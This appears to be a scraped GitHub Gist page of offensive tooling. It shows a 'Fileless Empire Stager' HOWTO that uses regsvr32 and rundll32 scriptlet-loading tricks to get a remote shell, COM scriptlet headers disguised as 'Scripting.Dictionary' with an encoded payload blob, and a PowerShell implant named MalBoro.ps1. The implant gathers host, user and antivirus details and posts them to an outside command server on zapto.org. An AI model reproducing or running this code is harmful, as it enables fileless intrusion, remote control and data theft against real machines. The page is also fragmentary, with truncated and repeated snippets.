Skip to content

Instantly share code, notes, and snippets.

<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/jt/9f/53f28D9j36NX+vX/A1/zd/w1/g1fiv64zeTz/6CPfon/TUUsd9Tfv+1BG885uev8QfJ53/ob/hr0o/f8w9nAAzD/LQ/+HlKcL+LX35PAvkbeV/8Qvr/b0r//wN+jV8DH/9Gu7/Gr/E7eV/f+KS/xq/xG3h//gb097e9v8dt/q6ln3/ZbyFteay/ltdAPv4DxnVTT38Nxe33pP//JvT/3yZsRx//nuM6L6up4AqcGZYhsmv3JPyEyLUnP7/9a+CVX/fX+Ic+ovmgPn7NX4P//+v9Bh85nrjN8zvu/Dq/xn/9a/C7v/mv8WvU9GPV/Ga/xq+RJL9eRX8nv8av8R/8ukTZ/+DX+DW2aODJb/i7/BZ//G9LjX+j3+C3qR9S07/kN/htt35L+vwv+Q1+O/3529ff589/B/37d6z/Uf77d9K/f+f6d/818fcv0L9/lx8zvyT1lL/5XX7DX78i4ia/8W/xa2/91vLVb2Ta/Mb1L5E2v8mvX/028tFvar77zeo/W777zX/9inBMqt+OP9/67elH/ffTV7/N7/J7bv0O9Mcv/BbG+5th9L/mr/Hb/La/xq9Lg/41v/Vrbf0CHu+v8a1f47fc+bV+jce/Bk/Jb/5r/FL69tf5rf6vX/O3+b9o1Nsf/Rr1f0ig/iUSwV9r63dBLyn90/yuTLE/CE3lhd/wk1/j1//Wb7nza/4aJBWQV4ID5k8++TV+vW999Gv8Wn8Q/rDf/zr8
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
@Elm0D
Elm0D / HOWTO
Created May 4, 2017 14:45
Fileless Empire Stager
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
@Elm0D
Elm0D / MalBoro.ps1
Last active October 30, 2018 17:32
$spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://elmod.zapto.org:1166/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req